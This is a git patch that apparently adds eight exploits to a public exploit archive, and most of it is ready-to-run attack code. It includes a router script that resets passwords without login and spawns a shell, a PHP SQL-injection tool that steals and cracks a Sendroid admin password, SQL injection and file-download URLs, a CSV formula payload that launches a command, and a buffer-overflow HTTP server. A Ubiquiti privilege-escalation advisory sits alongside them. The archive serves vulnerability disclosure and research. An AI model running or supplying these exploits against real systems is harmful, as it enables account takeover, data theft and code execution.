From b91055c9da17deeb62e426558e1c0bc4fa06699b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 27 Dec 2017 05:02:31 +0000 Subject: [PATCH] DB: 2017-12-27 8 changes to exploits/shellcodes GetGo Download Manager 5.3.0.2712 - Buffer Overflow Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation COMTREND ADSL Router CT-5367 - Remote Code Execution Joomla! Component JEXTN FAQ Pro 4.0.0 - 'id' SQL Injection Biometric Shift Employee Management System 3.0 - Local File Disclosure Sendroid < 6.5.0 - SQL Injection SilverStripe CMS 3.6.2 - CSV Excel Macro Injection Cells Blog 3.5 - 'bgid' / 'fmid' / 'fnid' SQL Injection --- exploits/hardware/remote/43389.py | 124 ++++++++++++++++++ exploits/php/webapps/43349.txt | 79 ++++++++++++ exploits/php/webapps/43393.txt | 26 ++++ exploits/php/webapps/43394.txt | 23 ++++ exploits/php/webapps/43395.php | 204 ++++++++++++++++++++++++++++++ exploits/php/webapps/43396.txt | 36 ++++++ exploits/windows/dos/43391.py | 57 +++++++++ exploits/windows/local/43390.txt | 115 +++++++++++++++++ files_exploits.csv | 8 ++ 9 files changed, 672 insertions(+) create mode 100755 exploits/hardware/remote/43389.py create mode 100644 exploits/php/webapps/43349.txt create mode 100644 exploits/php/webapps/43393.txt create mode 100644 exploits/php/webapps/43394.txt create mode 100644 exploits/php/webapps/43395.php create mode 100644 exploits/php/webapps/43396.txt create mode 100755 exploits/windows/dos/43391.py create mode 100644 exploits/windows/local/43390.txt diff --git a/exploits/hardware/remote/43389.py b/exploits/hardware/remote/43389.py new file mode 100755 index 000000000..90c491d6c --- /dev/null +++ b/exploits/hardware/remote/43389.py @@ -0,0 +1,124 @@ +# Exploit Title: Globalnet COMTREND ADSL Router CT-5367 Remote Code Execute +# Date: 11-12-2017 +# Exploit Author: TnMch +# Software Link : null +# Type : HardWare +# Risk of use : High +# Type to use : Remote + + +1. Description + +Any user can edit all users password and execute remote code directly without have access + +2. Proof of Concept + +request this page before login to ADSL panel : 192.168.1.1/password.cgi/password.cgi + +
+ + + + + + + + + + + + + + + + + +
Username:
Old Password:
New Password:
Confirm Password:
+
+
+
+ + +3 .exploit + + +#!/usr/bin/env python +import platform +import requests +import base64 + +url = "http://192.168.1.1/" + +''' first check default gateway ''' + +r = requests.get(url,allow_redirects=True) +resp = r.content + +'''Check resp''' + +if 'Authorization' not in resp: + exit("[-]Invalid host !! ") + +''' Change password ''' + +again = True + +while again: + print "Which User" + print "(root | support | user )" + user = raw_input('user : ').split()[0] + + if user not in ("root","support","user"): + exit("[-] No user with this name !! ") + + print "[+] Update password ",user + password = raw_input('new password : ').split()[0] + print "[+] Update new password ['",password,"']" + + if user == "root": + url +="password.cgi?sysPassword="+password + if user == "support": + url +="password.cgi?sptPassword="+password + if user == "user": + url +="password.cgi?usrPassword="+password + + pass_b64 = password.encode('base64').split()[0] + + r2 = requests.get(url,allow_redirects=True) + resp2 = r2.content + + ''' Check update ''' + + if pass_b64 in resp2: + print "[+] Password for user : ",user," updated!" + print "Happy hacking :D, enjoy" + else: + print "[-] Something Wrong , please check again! " + + y_n = raw_input('Do you want again? :D (y/n) : ').split()[0] + + if 'n'!= y_n and 'y' != y_n: + exit('bad input :(') + if y_n == 'n': + print "Go Go Go :D ,No Time for you Mr.Robot" + shell_yn= raw_input("Do you want shell? (y/n) :D : ").split()[0] + if shell_yn !='n': + sys = platform.system() + if sys =="Windows": + exit("Sorry only on Linux or Mac Os") + from pwn import * + target = "192.168.1.1" + port = 23 + p = remote(target,port) + p.recvuntil("Login:") + p.sendline(user) + p.recvuntil("Password:") + p.sendline(password) + p.sendline("sysinfo ;sh") + p.interactive() + again = False \ No newline at end of file diff --git a/exploits/php/webapps/43349.txt b/exploits/php/webapps/43349.txt new file mode 100644 index 000000000..9a470c059 --- /dev/null +++ b/exploits/php/webapps/43349.txt @@ -0,0 +1,79 @@ +# # # # # +# Exploit Title: Cells Blog 3.5 - SQL Injection +# Dork: N/A +# Date: 16.12.2017 +# Vendor Homepage: http://www.cells.tw/ +# Software Link: http://www.cells.tw/cells/ +# Version: 3.5 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/pub_post.php?bgid=[SQL]&fmid=[SQL] +# +# -7+UNION%20SELECT+0x253331%2c0x253332%2c0x253333%2c0x253334%2c0x253335%2c0x253336%2c0x253337%2c0x253338%2c%39%2c0x253331253330%2c0x253331253331%2c0x253331253332%2c0x253331253333%2c0x253331253334%2c0x253331253335%2c0x253331253336%2c0x253331253337%2c0x253331253338%2c0x253331253339%2d%2d%20%2d +# +# Parameter: bgid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: bgid=1 AND 9841=9841&fmid=7 +# +# Parameter: fmid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: bgid=1&fmid=7 AND 2056=2056 +# 2) +# http://localhost/[PATH]/pub_openpic.php?bgid=[SQL]&fmid=[SQL]&fnid=[SQL] +# +# Parameter: fnid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: bgid=2&fmid=10&fnid=12 AND 1592=1592 +# +# Parameter: fmid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: bgid=2&fmid=10 AND 3227=3227&fnid=12 +# +# Parameter: bgid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: bgid=2 AND 6608=6608&fmid=10&fnid=12 +# +# 3) +# http://localhost/[PATH]/album.php?bgid=[SQL]&fmid=[SQL] +# +# Parameter: fmid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: bgid=2&fmid=10 AND 9273=9273 +# +# Parameter: bgid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: bgid=2 AND 9536=9536&fmid=10 +# +# 4) +# http://localhost/[PATH]/fourm.php?bgid=[SQL]&fmid=[SQL] +# +# Parameter: fmid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: bgid=1&fmid=2 AND 5699=5699 +# +# Parameter: bgid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: bgid=1 AND 9899=9899&fmid=2 +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43393.txt b/exploits/php/webapps/43393.txt new file mode 100644 index 000000000..550c62c11 --- /dev/null +++ b/exploits/php/webapps/43393.txt @@ -0,0 +1,26 @@ +# # # # # +# Exploit Title: Joomla! Component JEXTN FAQ Pro 4.0.0 - SQL Injection +# Dork: N/A +# Date: 24.12.2017 +# Vendor Homepage: http://jextn.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/faq/jextn-faq-pro/ +# Version: 4.0.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-17875 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/index.php?option=com_jefaqpro&view=category&id=[SQL]&Itemid=494 +# +# 11+OR+1+GROUP+BY+CONCAT_WS(0x3a,0x496873616e53656e63616e,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1 +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43394.txt b/exploits/php/webapps/43394.txt new file mode 100644 index 000000000..df73616f7 --- /dev/null +++ b/exploits/php/webapps/43394.txt @@ -0,0 +1,23 @@ +# # # # # +# Exploit Title: Biometric Shift Employee Management System 3.0 - Local File Download +# Dork: N/A +# Date: 24.12.2017 +# Vendor Homepage: https://www.shiftsystems.net/ +# Software Link: https://codecanyon.net/item/white-label-shift-employee-management-system/21061908 +# Version: 3.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2017-17876 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker download local files.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/index.php?user=download?name=VerAyari.Ver&path=[FILE] +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43395.php b/exploits/php/webapps/43395.php new file mode 100644 index 000000000..67d3c94c5 --- /dev/null +++ b/exploits/php/webapps/43395.php @@ -0,0 +1,204 @@ +# Exploit Title: Sendroid - Bulk SMS Portal, Marketing Script( 5.0.0 - 6.5.0 ) - SQL Injection +# Google Dork: "welcome to * SMS portal" +# Date: 22/12/2017 +# Exploit Author: Onwuka Gideon +Contact: http://twitter.com/@gideon_onwuka +# Vendor Homepage: http://ynetinteractive.com/ +# Software Buy: https://codecanyon.net/item/sendroid-bulk-sms-portal-marketing-2way-messaging-script-with-mobile-app/14657225 +# Version: 5.0.0 - 6.5.0 +# Tested on: Mac OS + + +1. Description + +The softaware suffers from SQL Injection: +"/API/index.php?action=compose&username=sender&api_key=sdsd&sender" + +2. Script (Automatic takeover) + +Attached to mail + +4. How to run Script + You must have PHP installed on your system to run the script. + + - First, copy the code to a file and save(eg: sendroid_exploit.php) + - Open up your command line and CD into the directory where you saved the file. + - Now, type "$ php -f sendroid_exploit.php url=http://localhost/sms" + +Note: The URL should be a direct link to where the software is installed. + +3. Proof of Concept + +Run the script for example: + php -f sendroid_exploit.php url=http://localhost/sms + + +* +*/ + +parse_str(implode('&', array_slice($argv, 1)), $_GET); + +$queries =[ + "sql_get_email" => "/*!12345SELECT*/+email+FROM+users+WHERE+username='admin'", + "sql_get_password0" => "/*!12345SELECT*/+SUBSTRING(password,1,32)+FROM+users+WHERE+username='admin'", + "sql_get_password1" => "/*!12345SELECT*/+SUBSTRING(password,33)+FROM+users+WHERE+username='admin'", +]; + +$payload = "/API/index.php?action=compose&username=asdasd%27)%20OR%20(SELECT%203321%20FROM(SELECT%20COUNT(*),CONCAT+((),FLOOR(RAND(0)*2))x%20FROM%20/*!INFORMATION_SCHEMA*/.PLUGINS%20GROUP%20BY%20x)a)--%20RPjw&api_key=sdsd&sender"; +// + +checkCommands(); + +print_r(getEmailAndPassword($_GET['url'], $payload, $queries)); + + +/** +* +* Checks if minimum expected command is issued +* +* @param: $_GET +* @return; Boolean +**/ + + +function checkCommands(){ + + //url && shell + $url = $_GET['url'] ?? ""; + + if( $url == "" ) { + + "Please enter a target"; + + help(); + exit(1); + } +} + +// Print help message +function help(){ + + echo "Invalid command " . PHP_EOL; + echo "eg php -f sendroid_exploit.php url=https://localhost/sms" . PHP_EOL; + echo "" . PHP_EOL; +} + + +// == +// == Reset password and Get the Password hash +// == +function getEmailAndPassword($url, $payload, $queries){ + + //>> Fetch admin email + echo "Fetching admin email....:"; + $sql_get_email = $url . str_replace("", $queries['sql_get_email'], $payload); + $email = extractValue(makeRequest($sql_get_email)); + echo $email . PHP_EOL.PHP_EOL; + //<< EndFetch admin email + + //>> Fetch admin old pass + echo "Fetching admin old password...:"; + $sql_old_password0 = $url . str_replace("", $queries['sql_get_password0'], $payload); + $sql_old_password1 = $url . str_replace("", $queries['sql_get_password1'], $payload); + $old_password = extractValue(makeRequest($sql_old_password0), 'password') . extractValue(makeRequest($sql_old_password1), 'password'); + echo $old_password . PHP_EOL.PHP_EOL; + //<< End Fetch admin old + + // Now we have the old password and admin email + // reset password + echo "Resetting password...:"; + $forgot_password = $url . "/administrator/index.php?reset&p"; + makeRequest($forgot_password, "POST", ["userEmail" => $email]); + echo " Done!" . PHP_EOL.PHP_EOL; + + //>> Fetch admin new password + echo "Getting new password...:"; + $sql_new_password0 = $url . str_replace("", $queries['sql_get_password0'], $payload); + $sql_new_password1 = $url . str_replace("", $queries['sql_get_password1'], $payload); + $new_password = extractValue(makeRequest($sql_new_password0), 'password') . extractValue(makeRequest($sql_new_password1), 'password'); + echo $new_password . PHP_EOL.PHP_EOL; + //<< End Fetch admin new password + + //>> Cracking password + echo "Craking password...:"; + $password = crackPassword($new_password); + echo $password . PHP_EOL.PHP_EOL; + //<< Cracking password + + // return $sql_get_email; + return ["email" => $email, "password" => $password]; +} + +// +// POST and GET request +// == +function makeRequest($url, $method = "GET", $parameter = []){ + + // Get cURL resource + $curl = curl_init(); + // Set some options - we are passing in a useragent too here + if( strtolower($method) == "post" ){ + curl_setopt_array($curl, [ + CURLOPT_RETURNTRANSFER => 1, + CURLOPT_URL => $url, + CURLOPT_USERAGENT => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 0_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36', + CURLOPT_POST => 1, + CURLOPT_POSTFIELDS => $parameter + ]); + } + else{ + + curl_setopt_array($curl, [ + CURLOPT_RETURNTRANSFER => 1, + CURLOPT_URL => $url, + CURLOPT_USERAGENT => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 0_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36' + ]); + } + // Send the request & save response to $resp + $resp = curl_exec($curl); + // Close request to clear up some resources + curl_close($curl); + + return $resp; +} + +// Extract the real value +function extractValue($payload, $what = "email"){ + + $patterns = []; $patterns[0] = "/ for key 'group_key'/"; $patterns[1] = "/Duplicate entry /"; $patterns[2] = "/\s\s+/"; $patterns[3] = "/'/"; + $replacements = []; $replacement[0] = ""; $replacements[1] = ""; $replacements[2] = ""; $replacements[3] = ""; + + $result = preg_replace($patterns, $replacements, $payload); + + return substr($result, 0, -1); +} + + +function crackPassword($password){ + + echo " cracking... please wait... "; + + $pwsalt = explode( ":",$password ); + + for ($i=1; $i < 20000000000000 ; $i++) { + + if(md5($i . $pwsalt[1]) == $pwsalt[0] ) { + + return $i; + } + + } + + return "Could not crack password"; +} + +If you successfully run the script, you'll get the admin password. You can login to the admin portal: +localhost/sms/administrator/ + +4. Solution: + +Update to the latest version \ No newline at end of file diff --git a/exploits/php/webapps/43396.txt b/exploits/php/webapps/43396.txt new file mode 100644 index 000000000..ee0b65bcd --- /dev/null +++ b/exploits/php/webapps/43396.txt @@ -0,0 +1,36 @@ +Exploit Title: SilverStripe CMS - 3.6.2 CSV Excel Macro Injection +Vendor Homepage: https://www.silverstripe.org/ +Software Link: https://www.silverstripe.org/download +Discovered by: Ishaq Mohammed +Contact: https://twitter.com/security_prince +Website: https://about.me/security-prince +Category: web apps +Platform: PHP + +Description: + +In the CSV export feature of the SilverStripe CMS, it's possible for the +output to contain macros and scripts, which if imported without +sanitization into software (including Microsoft Excel) may be executed. + +Proof of Concept +Steps to Reproduce: + +1. Login with normal user's credentials +2. Access the below URL via your browser: +http://localhost/SilverStripe/admin/myprofile +3. Enter the below payload in the "First Name" field and save the profile" +@SUM(1+1)*cmd|' /C calc'!A0 +4. Log in with admin's credentials on a different browser +5. Access te security page at the below link: +http://localhost/SilverStripe/admin/security/ +6. Click on "Export to CSV" option and open the exported CSV file in any +Spreadsheet application + + +Solution: +The issue has been fixed in the latest release of SilverStripe which can be +downloaded from here: https://www.silverstripe.org/download + +Reference: +https://www.silverstripe.org/download/security-releases/ss-2017-007 \ No newline at end of file diff --git a/exploits/windows/dos/43391.py b/exploits/windows/dos/43391.py new file mode 100755 index 000000000..e174ac552 --- /dev/null +++ b/exploits/windows/dos/43391.py @@ -0,0 +1,57 @@ +# Exploit Title: Buffer overflow vulnerability in GetGo Download Manager 5.3.0.2712 +# CVE: CVE-2017-17849 +# Date: 22-12-2017 +# Tested on Windows 10 32 bits +# Exploit Author: Aloyce J. Makalanga +# Contact: https://twitter.com/aloycemjr +# Software Link: http://www.getgosoft.com/getgodm/ +# Category: webapps +# Attack Type: Remote +# Impact: Code Execution + + + +1. Description + +A buffer overflow vulnerability in GetGo Download Manager 5.3.0.2712 and earlier could allow remote HTTP servers to execute arbitrary code on NAS devices via a long response. To exploit this vulnerability, an attacker needs to issue a malicious-crafted payload in the HTTP Response Header. A successful attack could result in code execution on the victim computer. + + +2. Proof of Concept + + + +def main(): + host = "192.168.205.128" + port = 80 + + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind((host, port)) + s.listen(1) + print "\n[+] Listening on %d ..." % port + + cl, addr = s.accept() + print "[+] Connection accepted from %s" % addr[0] + + evilbuffer = "A" * 4105 + hardCodedEIP= "\x69\x9E\x45\x76" #This is a hardcoded EIP just for demo . As you can see on the screenshot, we hit a breakpoint, right here on this EIP. Do you see our stack!!! You need to change this. + pads = "C"*(6000 - len(evilbuffer + hardCodedEIP)) + payload = evilbuffer + hardCodedEIP + pads + + buffer = "HTTP/1.1 200 " + payload + "\r\n" + + print cl.recv(1000) + cl.send(buffer) + print "[+] Sending buffer: OK\n" + + sleep(3) + cl.close() + s.close() + +if __name__ == '__main__': + import socket + from time import sleep + main() + +3. Solution: + + No solution as of yet. \ No newline at end of file diff --git a/exploits/windows/local/43390.txt b/exploits/windows/local/43390.txt new file mode 100644 index 000000000..ebfb3eb44 --- /dev/null +++ b/exploits/windows/local/43390.txt @@ -0,0 +1,115 @@ +RCE Security Advisory +https://www.rcesecurity.com + + +1. ADVISORY INFORMATION +======================= +Product: Ubiquiti UniFi Video (Windows) +Vendor URL: https://www.ubnt.com +Type: Improper Handling of Insufficient Permissions or Privileges + [CWE-280] +Date found: 2016-05-24 +Date published: 2017-12-20 +CVSSv3 Score: 7.8 (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) +CVE: CVE-2016-6914 + + +2. CREDITS +========== +This vulnerability was discovered and researched by Julien Ahrens from +RCE Security. + + +3. VERSIONS AFFECTED +==================== +UniFi Video 3.7.3 (Windows), +UniFi Video 3.7.0 (Windows), +UniFi Video 3.2.2 (Windows), +older versions may be affected too. + + +4. INTRODUCTION +=============== +UniFi Video is a powerful and flexible, integrated IP video management +surveillance system designed to work with Ubiquiti’s UniFi Video Camera product +line. UniFi Video has an intuitive, configurable, and feature‑packed user +interface with advanced features such as motion detection, auto‑discovery, +user-level security, storage management, reporting, and mobile device support. + +(from the vendor's homepage) + + +5. VULNERABILITY DETAILS +======================== +Ubiquiti UniFi Video for Windows is installed to "C:\ProgramData\unifi-video\" +by default and is also shipped with a service called "Ubiquiti UniFi Video". Its +executable "avService.exe" is placed in the same directory and also runs under +the NT AUTHORITY/SYSTEM account. + +However the default permissions on the "C:\ProgramData\unifi-video" folder are +inherited from "C:\ProgramData" and are not explicitly overridden, which allows +all users, even unprivileged ones, to append and write files to the application +directory: + +c:\ProgramData>icacls unifi-video +unifi-video NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) +BUILTIN\Administrators:(I)(OI)(CI)(F) +CREATOR OWNER:(I)(OI)(CI)(IO)(F) +BUILTIN\Users:(I)(OI)(CI)(RX) +BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA) + +Upon start and stop of the service, it tries to load and execute the file at +"C:\ProgramData\unifi-video\taskkill.exe". However this file does not exist in +the application directory by default at all. + +By copying an arbitrary "taskkill.exe" to "C:\ProgramData\unifi-video\" as an +unprivileged user, it is therefore possible to escalate privileges and execute +arbitrary code as NT AUTHORITY/SYSTEM. + + +6. RISK +======= +To successfully exploit this vulnerability, an attacker must already have access +to a system running a vulnerable installation of UniFi video using a +low-privileged user account (i.e. through a password compromise). + +The vulnerability allows local attackers to escalate privileges and execute +arbitrary code as NT AUTHORITY/SYSTEM, which basically means a complete loss of +the system's confidentiality, integrity as well as availability. + + +7. SOLUTION +=========== +Update to v3.8.0 + + +8. REPORT TIMELINE +================== +2016-05-24: Discovery of the vulnerability +2016-05-24: Reported to vendor via HackerOne (#140793) +2016-05-24: Vendor acknowledges the vulnerability +2016-08-22: Request for status update +2016-08-22: Vendor states that there is no update so far +2016-08-23: MITRE assigns CVE-2016-6914 +2016-11-08: Request for status update +2016-11-08: Vendor states that there is no update so far +2016-12-08: Request for status update +2016-12-08: Vendor states that project team is working on it +2017-02-23: Request for status update +2017-03-23: No response from vendor +2017-03-23: Request for status update +2017-03-23: Vendor states that fix is scheduled for v3.7.0 +2017-05-23: v3.7.0 was released, but vulnerability is still exploitable, + vendor notified again +2017-06-07: Vendor states that fix is actually delayed +2017-08-26: Vendor provides beta versions of 3.7.3 and 3.8.0-beta3, which should + fix the issue +2017-08-31: While v3.7.3 is still vulnerable, the issue was fixed in 3.8.0-beta3 +2017-09-18: v3.8.0 released publicly +2017-12-20: Public disclosure + + +9. REFERENCES +============= +http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-6914 +https://hackerone.com/reports/140793 \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 7ca674cd3..1d8b77523 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5432,6 +5432,7 @@ id,file,description,date,author,type,platform,port 43372,exploits/windows/dos/43372.html,"Microsoft Windows - 'jscript!RegExpFncObj::LastParen' Out-of-Bounds Read",2017-12-19,"Google Security Research",dos,windows, 43373,exploits/windows/dos/43373.txt,"Intel Content Protection HECI Service - Type Confusion Privilege Escalation",2017-12-19,"Google Security Research",dos,windows, 43380,exploits/windows/dos/43380.cpp,"Microsoft Windows Kernel - 'NtQueryVirtualMemory(MemoryMappedFilenameInformation)' Double-Write Ring-0 Address Leak",2017-12-20,"Google Security Research",dos,windows, +43391,exploits/windows/dos/43391.py,"GetGo Download Manager 5.3.0.2712 - Buffer Overflow",2017-12-26,"Aloyce J. Makalanga",dos,windows, 41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows, 41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows, 41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows, @@ -9233,6 +9234,7 @@ id,file,description,date,author,type,platform,port 41619,exploits/windows/local/41619.txt,"Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,local,windows, 43359,exploits/linux/local/43359.c,"Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape",2017-01-04,"Sebastian Krahmer",local,linux, 43366,exploits/windows/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change (PoC)",2017-12-04,gellin,local,windows, +43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows, 41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android, 41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple, 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows, @@ -15867,6 +15869,7 @@ id,file,description,date,author,type,platform,port 43386,exploits/linux/remote/43386.py,"Fortinet FortiGate 4.x < 5.0.7 - SSH Backdoor Access",2016-01-09,operator8203,remote,linux, 43387,exploits/hardware/remote/43387.py,"Netcore / Netis Routers - UDP Backdoor Access",2016-12-15,nixawk,remote,hardware,53413 43388,exploits/multiple/remote/43388.md,"Trend Micro Smart Protection Server - Session Hijacking / Log File Disclosure / Remote Command Execution / Cron Job Injection / Local File Inclusion / Stored Cross-Site Scripting / Improper Access Control",2017-12-19,CoreLabs,remote,multiple, +43389,exploits/hardware/remote/43389.py,"COMTREND ADSL Router CT-5367 - Remote Code Execution",2017-12-26,TnMch,remote,hardware, 41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows, 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows, 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows, @@ -37662,6 +37665,10 @@ id,file,description,date,author,type,platform,port 43377,exploits/multiple/webapps/43377.txt,"Conarc iChannel - Improper Access Restrictions",2017-12-20,"Information Paradox",webapps,multiple, 43378,exploits/multiple/webapps/43378.py,"Ability Mail Server 3.3.2 - Cross-Site Scripting",2017-12-20,"Aloyce J. Makalanga",webapps,multiple, 43379,exploits/windows/webapps/43379.txt,"BEIMS ContractorWeb 5.18.0.0 - SQL Injection",2017-12-20,"Rajwinder Singh",webapps,windows, +43393,exploits/php/webapps/43393.txt,"Joomla! Component JEXTN FAQ Pro 4.0.0 - 'id' SQL Injection",2017-12-26,"Ihsan Sencan",webapps,php, +43394,exploits/php/webapps/43394.txt,"Biometric Shift Employee Management System 3.0 - Local File Disclosure",2017-12-26,"Ihsan Sencan",webapps,php, +43395,exploits/php/webapps/43395.php,"Sendroid < 6.5.0 - SQL Injection",2017-12-26,"Onwuka Gideon",webapps,php, +43396,exploits/php/webapps/43396.txt,"SilverStripe CMS 3.6.2 - CSV Excel Macro Injection",2017-12-26,"Ishaq Mohammed",webapps,php, 41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php, 41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware, 41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware, @@ -38415,3 +38422,4 @@ id,file,description,date,author,type,platform,port 43343,exploits/cgi/webapps/43343.py,"ITGuard-Manager 0.0.0.1 - Remote Code Execution",2017-12-15,"Nassim Asrir",webapps,cgi, 43346,exploits/php/webapps/43346.txt,"Movie Guide 2.0 - SQL Injection",2017-12-15,"Ihsan Sencan",webapps,php,80 43348,exploits/php/webapps/43348.txt,"Monstra CMS 3.0.4 - Arbitrary File Upload / Remote Code Execution",2017-12-18,"Ishaq Mohammed",webapps,php, +43349,exploits/php/webapps/43349.txt,"Cells Blog 3.5 - 'bgid' / 'fmid' / 'fnid' SQL Injection",2017-12-18,"Ihsan Sencan",webapps,php,